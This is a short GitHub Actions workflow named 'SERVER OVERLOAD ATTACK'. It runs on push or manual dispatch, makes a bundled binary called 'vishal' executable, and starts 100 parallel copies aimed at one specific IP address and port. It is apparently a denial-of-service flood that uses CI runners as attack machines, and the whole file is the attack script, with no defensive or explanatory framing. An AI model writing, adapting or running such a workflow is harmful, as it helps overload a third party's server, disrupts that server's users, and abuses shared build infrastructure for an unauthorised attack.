name: SERVER OVERLOAD ATTACK
on: [workflow_dispatch, push]

jobs:
  server_overload:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x vishal
      - run: |
          for i in {1..100}; do
            ./vishal 91.108.17.34 32001 200 &
          done
          wait
